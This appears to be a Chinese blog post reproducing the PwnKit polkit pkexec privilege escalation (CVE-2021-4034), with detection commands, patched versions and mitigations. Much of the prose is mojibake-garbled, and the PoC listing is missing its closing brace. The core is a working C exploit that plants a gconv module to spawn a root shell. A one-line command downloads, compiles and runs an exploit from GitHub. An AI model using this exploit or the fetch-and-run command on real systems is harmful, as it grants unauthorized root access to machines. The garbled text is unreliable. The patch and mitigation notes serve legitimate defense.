æ¬æä¸»è¦å¤ç°2022å¹´1æåºç°çPolkitçRCEæ¼æ´

1.æ¼æ´å½±åèå´

ç»å¤§å¤æ°çæ¬linuxé½å¨æ¬æ¬¡å½±åèå´ä¸

æ¼æ´æ£æµæ¹æ³ï¼
centosï¼rpm -qa |grep 'polkit'
ubuntuï¼dpkg -l policykit-1

2.æ¼æ´å½±ååææ¡ä»¶

ææä»¶çæ§è¡æé
ægccç¼è¯ï¼æå¥½ï¼æ²¡æä¹å¯ä»¥ç¸åçæ¬ä¸èªè¡ç¼è¯ï¼

3. æ¼æ´å¤ç°

3.1POC

/*
 * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkitâs pkexec (CVE-2021-4034) by Andris Raugulis <[email protected]>
 * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell = 
	"#include <stdio.h>\n"
	"#include <stdlib.h>\n"
	"#include <unistd.h>\n\n"
	"void gconv() {}\n"
	"void gconv_init() {\n"
	"	setuid(0); setgid(0);\n"
	"	seteuid(0); setegid(0);\n"
	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
	"	exit(0);\n"
	"}";

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);

ä½¿ç¨æ¹æ³ï¼gccç¼è¯+æ§è¡å³å¯

3.2å¿«æ·çæ¼æ´å©ç¨

ç´æ¥æ§è¡

wget https://ghproxy.com/https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c && gcc cve-2021-4034-poc.c -o cve-2021-4034-poc && ./cve-2021-4034-poc

3.3æ¼æ´ç»æ

è¿è¡ä¸è¿°å½ä»¤åå¦æ¼æ´æªä¿®å¤ä¾¿å¯ç´æ¥è·årootæéã

4.æ¼æ´ä¿®å¤

4.1ä¿®å¤çæ¬

centosï¼

CentOS 6ï¼polkit-0.96-11.el6_10.2
CentOS7ï¼polkit-0.112-26.el7_9.1
CentOS 8.0ï¼polkit-0.115-13.el8_5.1
CentOS 8.2ï¼polkit-0.115-11.el8_2.2
CentOS 8.4ï¼polkit-0.115-11.el8_4.2

ubuntuï¼

Ubuntu 20.04 LTSï¼policykit-1 - 0.105-26ubuntu1.2
Ubuntu 18.04 LTSï¼policykit-1 - 0.105-20ubuntu0.18.04.6
Ubuntu 16.04 ESMï¼policykit-1 - 0.105-14.1ubuntu0.5+esm1
Ubuntu 14.04 ESMï¼policykit-1 - 0.105-4ubuntu3.14.04.6+esm1

4.2 ä¿®å¤æ¹æ¡

4.2.1 åæ°éå®

æ³¨ï¼æ¨èè¯¥æ¹æ¡ï¼è¿ç§æ¹æ¡ä¸å¯¹ä¸å¡çå ä¹æ²¡æå½±å

1ãä¿®æ¹pkexecçæéï¼chmod 0755 /usr/bin/pkexec 
2ãå¦æpkexecéå¿è¦ï¼å¯ä¸´æ¶å é¤è¯¥å¯æ§è¡ç¨åº

4.2.2 çæ¬åçº§

æ³¨æ ï¼

åçº§å®åéç¡®ä¿polkitåçº§å°äºå®å¨çæ¬ï¼æäºyumæºççæ¬æªæ´æ°å°å®å¨çæ¬

centosï¼yum -y install polkit
ubuntuï¼apt-get install policykit-1

Polkit本地权限提升漏洞（CVE-2021-4034）复现

1.æ¼æ´å½±åèå´

2.æ¼æ´å½±ååææ¡ä»¶

3. æ¼æ´å¤ç°

3.1POC

3.2å¿«æ·çæ¼æ´å©ç¨

3.3æ¼æ´ç»æ

4.æ¼æ´ä¿®å¤

4.1ä¿®å¤çæ¬

4.2 ä¿®å¤æ¹æ¡

4.2.1 åæ°éå®

4.2.2 çæ¬åçº§